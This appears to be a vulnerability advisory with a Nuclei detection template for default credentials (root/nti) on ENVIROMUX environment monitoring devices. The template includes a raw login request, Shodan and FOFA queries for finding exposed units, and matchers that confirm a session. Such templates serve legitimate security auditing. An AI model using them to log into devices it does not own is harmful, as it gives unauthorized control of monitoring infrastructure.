The ENVIROMUX environment monitoring system from Network Technologies Inc was found to be using its default login credentials. This default configuration could have allowed unauthorized users to gain access to the web management interface without authentication, potentially leading to information disclosure or unauthorized control over environmental monitoring systems.
PoC代码[已公开]
id: enviromuux-default-login
info:
name: Network Technologies Inc ENVIROMUX - Default Login
author: M.Sarmad Shafiq
severity: high
description: |
The ENVIROMUX environment monitoring system from Network Technologies Inc was found to be using its default login credentials. This default configuration could have allowed unauthorized users to gain access to the web management interface without authentication, potentially leading to information disclosure or unauthorized control over environmental monitoring systems.
reference:
- http://www.networktechinc.com/download/d-environment-monitor-16.html
- http://www.networktechinc.com/pdf/man154.pdf
metadata:
verified: true
max-request: 1
shodan-query: html:"ENVIROMUX"
fofa-query: body="ENVIROMUX"
tags: default-login,networktechnologies,enviromux,vuln
variables:
username: "root"
password: "nti"
http:
- raw:
- |
POST /goform/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"success":"true"'
- '"cookie":"sessionId='
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502206e8fca91b18eb2caa5fcc74ca566b1942e94dd6e37e4c9bb75d77985c286a695022100f5983791766a6bc5d12807d6e543d500bb3bd577397a891184745cc3d6ef2db1:922c64590222798bb761d5b6d8e72950